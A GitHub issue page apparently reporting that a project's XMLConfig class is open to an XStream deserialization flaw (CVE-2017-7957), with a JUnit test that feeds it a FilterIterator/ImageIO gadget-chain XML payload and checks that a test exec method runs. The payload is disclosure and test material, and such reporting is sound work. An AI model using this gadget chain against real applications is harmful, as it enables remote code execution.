We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
PLMCodeTemplate/source/src/common/plm/common/utils/XMLConfig.java
Line 28 in 85b7d74
package plm.common.utils; import com.thoughtworks.xstream.XStream; import com.thoughtworks.xstream.core.JVM; import org.junit.Before; import org.junit.Test; import java.util.Iterator; import static org.junit.Assert.assertEquals; public class XMLConfigTest { private static final StringBuilder BUFFER = new StringBuilder(); private XMLConfig xmlConfig; @Before public void setUp() { xmlConfig = new XMLConfig(); } @Test public void testToBeanVulnerableToCVE_2017_7957() { if (JVM.isVersion(7)) { final String xml = "" + "<string class='javax.imageio.spi.FilterIterator'>\n" + " <iter class='java.util.ArrayList$Itr'>\n" + " <cursor>0</cursor>\n" + " <lastRet>1</lastRet>\n" + " <expectedModCount>1</expectedModCount>\n" + " <outer-class>\n" + " <com.thoughtworks.acceptance.SecurityVulnerabilityTest_-Exec/>\n" + " </outer-class>\n" + " </iter>\n" + " <filter class='javax.imageio.ImageIO$ContainsFilter'>\n" + " <method>\n" + " <class>com.thoughtworks.acceptance.SecurityVulnerabilityTest$Exec</class>\n" + " <name>exec</name>\n" + " <parameter-types/>\n" + " </method>\n" + " <name>exec</name>\n" + " </filter>\n" + " <next/>\n" + "</string>"; XStream xstream = new XStream(); xstream.allowTypes(new String[]{"javax.imageio.ImageIO$ContainsFilter"}); final Iterator iterator = (Iterator) xmlConfig.toBean(xml, Iterator.class); assertEquals(0, BUFFER.length()); iterator.next(); assertEquals("Executed!", BUFFER.toString()); } } }
The text was updated successfully, but these errors were encountered:
No branches or pull requests
PLMCodeTemplate/source/src/common/plm/common/utils/XMLConfig.java
Line 28 in 85b7d74
The text was updated successfully, but these errors were encountered: